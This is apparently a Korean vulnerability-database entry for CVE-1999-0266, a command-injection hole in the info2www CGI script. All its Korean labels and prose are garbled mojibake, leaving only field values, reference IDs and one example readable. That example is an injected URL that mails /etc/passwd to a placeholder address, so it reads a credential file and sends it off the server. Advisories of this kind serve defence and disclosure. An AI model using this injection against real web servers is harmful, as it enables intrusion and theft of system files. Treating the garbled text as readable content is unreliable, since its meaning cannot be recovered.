| Ãë¾àÁ¡ID |
21055 |
| À§Çèµµ |
40 |
| Æ÷Æ® |
80, ... |
| ÇÁ·ÎÅäÄÝ |
TCP |
| ºÐ·ù |
CGI |
| »ó¼¼¼³¸í |
ÇØ´ç À¥¼¹ö¿¡ "info2www" CGI ÇÁ·Î±×·¥ÀÌ ¼³Ä¡µÇ¾î ÀÖ´Ù. ÀÌ CGI ½ºÅ©¸³Æ®´Â GNU Info NodeµéÀ» À¥À» ÅëÇÏ¿© º¼ ¼ö ÀÖµµ·Ï HTML·Î º¯È¯Çϱâ À§ÇØ »ç¿ëµÇ´Â ÇÁ·Î±×·¥ÀÌ´Ù. ±×·¯³ª, ÀÌ CGI´Â ¿ÜºÎ¿¡¼ http µ¥¸óÀÇ ±ÇÇÑÀ¸·Î ÀÓÀÇÀÇ ¸í·ÉÀ» ¼öÇàÇÒ ¼ö ÀÖ´Â Àß ¾Ë·ÁÁ® ÀÖ´Â HoleÀ» °¡Áö°í ÀÖ´Ù. ¿¹¸¦µé¾î, ´ÙÀ½°ú °°Àº URLÀ» ¿ä±¸ÇÏ°Ô µÇ¸é
http://target/cgi-bin/info2www?"(../../../bin/mail your@email < /etc/passwd|)"
ÆÐ½º¿öµå ÆÄÀÏÀ» °¡Áö°í ¿Ã ¼öµµ ÀÖ´Ù.
* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû: Web Server |
| ÇØ°áÃ¥ |
Paranoid siteµéÀÇ ¸ðµç CGI ½ºÅ©¸³Æ®µéÀº º¸¾È Ãë¾àÁ¡µé¿¡ ´ëÇÑ Ã¶ÀúÇÏ°Ô °ËÁõµÉ ¶§±îÁö disableµÇ¾î¾ß ÇÑ´Ù. info2wwwÀÇ 1.2 ÀÌÀü ¹öÀüµéÀº ¸ðµÎ Ãë¾àÇϸç info2html, infogateµéµµ ¸¶Âù°¡Áö Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù. |
| °ü·Ã URL |
CVE-1999-0266 (CVE) |
| °ü·Ã URL |
1995 (SecurityFocus) |
| °ü·Ã URL |
1732 (ISS) |
|